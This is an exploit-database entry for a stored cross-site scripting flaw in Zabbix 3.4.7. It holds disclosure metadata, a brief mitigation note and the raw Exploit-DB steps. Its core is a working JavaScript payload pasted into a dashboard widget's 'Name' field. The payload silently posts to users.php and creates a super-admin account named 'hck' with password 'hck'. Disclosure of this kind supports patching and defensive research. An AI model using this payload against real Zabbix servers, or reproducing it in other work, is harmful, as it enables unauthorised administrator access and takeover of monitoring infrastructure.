Zabbix 3.4.7 - Stored XSS - exploit.company

vendor:

Zabbix

by:

Radmil Gazizov

9.1

CVSS

CRITICAL

Stored XSS

CWE

Product Name: Zabbix

Affected Version From: 3.4.7

Affected Version To: 3.4.7

Patch Exists: YES

Related CWE: CVE-2019-17382

CPE: a:zabbix:zabbix:3.4.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2021

Zabbix 3.4.7 – Stored XSS

An anonymous user can exploit a stored XSS vulnerability in Zabbix 3.4.7 by creating a new dashboard, adding a new widget, and pasting malicious code into the parameter 'Name'. This code will create a new user with the username 'hck' and the password 'hck' when the 'Add' button is clicked.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Zabbix 3.4.7 - Stored XSS
# Date: 30-03-2021
# Exploit Author: Radmil Gazizov
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn3.4.7
# Version: 3.4.7
# Tested on: Linux

# Reference -
https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt

1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
2- Create new dashboard
3- Add a new widget => Type: Map nabigation tree
4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
5- Click to "Add" button